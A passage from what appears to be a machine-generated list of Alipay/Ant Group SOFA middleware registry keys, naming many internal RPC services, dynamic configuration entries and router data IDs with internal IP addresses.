ER","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.StandardCategoryQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rep.component.facade.spi.EventDataQueryFacade:1.0:iriskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.PunishStrategyManageRevertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.cacheDumpOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbridge.common.service.facade.api.DelegateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanApplyCmdLoadTest.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxquote.service.facade.api.IfxExceptionDetailQuoteMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.integration.tbase.ZcacheClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.common.user.service.ChainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.oceanbase.obforumcore.service.activity.ActivityTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RCCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mdp.service.MallMdpTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundMainFinancialIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.product.SalesProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.synchronize.SynchronizeArticleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.service.facade.api.BenefitLifeSummaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mydidcommun@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.ding.DingUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.support.LoanSupportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.SolutionPackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.BrandApportionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.enableHistoryDataScanTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.archimedes.common.service.facade.api.StrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zprod.face.service.FaceDataRepositoryGzoneService:1.0:zhubbatchalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ChangeNoticeRangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.metadatacenter.facade.api.RiskItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_ZPROXY_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ecoquality@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.rank.QuotationRankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.logmonitor.service.LogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.247.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.SkuQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:igfas.merchantprepayment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftUserInviteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.asyncRunning,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.antschedulerconsole.facade.JobOpsOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepluban.common.service.facade.risk.PreciseAttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lothar4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommerce.pms.facade.PmsRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.222.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@antrdservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fpdecision.dfriskmng.facade.DxModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataprofiling.common.service.facade.admin.AdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.161.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ifinmng.service.facade.ctrl.AccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaViewAlarmDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue8#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.biz.tisout.ecological.TisEcologicalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antefi_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.45.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.speech.api.pop.PopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.facade.check.BbcModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendVoucherItemExclusiveModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charitypromo.core.service.AlipayHomeCardFacade:1.0:antfarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:merchant@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.LuckyBagServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secutrade.common.service.facade.api.trade.TradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.holder.HolderGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.tqpArrangementProductConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.common.service.facade.budget.BudgetService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.facade.rpc.spi.TsmRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.77.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmpservice.common.service.facade.DmpAlgoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.130.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fundAsyncFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.framodel.core.service.facade.api.FramodelFinQuantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OtoAppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.ReconClearConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:TestReadCacheSyncModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.assetflux.service.api.TwoPhasePaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.clearingcenter.facade.api.ClearingRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.appName:name=com.alipay.fc.fluxcons.biz.service.impl.drm.FluxConsDrmResource.summayReconApply,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.facade.CaeMerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.worker.WorkerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.149.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.api.IPOFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.PortfolioAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PermissionTreeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.rome.RomeResourceAssignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.BusinessDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.autoStartHour,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.emotion.rpc.api.ChatBackgroundRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.76.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.76.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.NoticeTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Cfpcenter-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.specialCharacters,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpdcore:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.facadeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.AntFortunePlusAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.bankCardCountLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appstoreCommodityAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthGiftTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.ProductService:1.0.0:productService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:zmhatcher@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.YebcFinUserFixedContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instanalysis.common.service.facade.route.RouterLiquidityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.IamBackManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lightmds.service.mds.MdsLogicDsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantBankCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.accouting.settling.SettlingFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equitypublishcore.common.service.facade.ShareHolderRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=SOFA-ThreadPool.null.data,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeoutcenter.common.service.facade.api.TimeoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantUserBindingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.manage.DataSchemaVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DISSEMINATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.seekers.facade.apis.RiskEntitySaveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.point.CommonPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.TopologyInfo.topologyRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.taskcenter.SopOperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationPersonSideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finriskeventseek.facade.FinriskeventseekMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.service.facade.DataRecover:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractAttachFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAYCORECHGTYPE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.150.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcp.service.facade.kb.feedback.KbFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.ProcessStateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.task.TaskDispatchMngServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.appx.analyse.api.AnalyseRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardReturnQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskdatacenter.service.facade.hpa.PortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tscenter.common.service.facade.TscenterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_INVOICE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.97.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quotstore.common.manage.facade.api.RelevancySymbolManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.fliggy.fcecore.service.CoreMgetService:1.0:1.0.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkqafactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.MaintenanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.influence.ArgoInfluenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.repayretain.RepayRetainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.FundForecastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudbox.cloudbox_local_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.facade.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.mart.facade.MrchstmDistrictQueryForCicadaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphad.common.service.facade.dataresource.IDataReSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.AlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.dynamic.facade.DynamicRuleDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.AccessTokenQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.dbackDefaultPriority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.subject.SubjectManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.bis.common.service.facade.face.FacePictureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.69.243.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.common.facade.callback.IdentitymatrixRollbackService:1.0:identitymatrix@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.usertask.facade.TaskSolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.query.QueryUserSubAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitestcenter.biz.dispatcher.service.TaskExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.operation.LifeSourceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundConvertConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.streammedia.common.service.facade.StreamMediaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:membercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.FundsBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pushcore.redirect.RedirectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_CHANNELROUTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:logisticfinancprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.145.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pledgecore.common.service.facade.api.PledgeAssetQueryFacade:1.0:pledgecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.157.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.netflowcore.api.RuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebppcenter.common.service.facade.api.RepaymentFacade:1.0:bkebppcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.cod.facade.CodPartnerOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@promoprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.freshFailThrowException,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.biz.money.core.MoneyAccountInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.HbaseTableCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.biz.service.impl.rpc.report.LifeReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOCIALPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ali